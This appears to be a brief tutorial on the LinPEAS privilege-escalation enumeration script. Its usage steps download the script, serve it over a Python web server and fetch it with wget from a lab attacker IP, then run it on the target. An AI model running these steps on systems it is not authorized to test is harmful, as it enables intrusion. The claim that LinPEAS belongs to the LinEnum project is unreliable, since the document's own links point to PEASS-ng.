LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts.
LinPEAS.sh is a script used for privilege escalation and enumeration on Linux systems. It is part of the LinEnum project, which is a collection of scripts and tools designed to assist in the discovery and exploitation of Linux vulnerabilities and weaknesses.
LinPEAS.sh, specifically, focuses on identifying misconfigurations, insecure settings, and other potential security issues that could lead to privilege escalation. It scans the system for various indicators and gathers information about the operating system, running processes, network connections, installed software, file permissions, and more.
The script performs a comprehensive analysis of the system, looking for common security weaknesses such as world-writable files, misconfigured cron jobs, weak file permissions, unquoted service paths, and other potential vulnerabilities that can be exploited by an attacker.
By running LinPEAS.sh, system administrators and security professionals can quickly identify potential security risks and take appropriate actions to mitigate them. It is a useful tool for both offensive security assessments and defensive security measures.
It’s worth noting that LinPEAS.sh should only be used on systems that you have permission to test or analyze. Running it on unauthorized systems or without proper authorization may be illegal and violate the system owner’s privacy and security rights. Always ensure you have proper authorization and follow ethical guidelines when using such tools.
How to use
1. Download the Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
- curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh > LinPEAS.sh
2. Send the file into the server, prepare a web server for the transfer
- python3 -m http.server 9999
3. Download from the remote machine
- wget http://10.10.14.8:9999/LinPEAS.sh
4. Run the application
- bash LinPEAS.sh
Sources
https://github.com/carlospolop/PEASS-ng/releases/tag/20220612
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS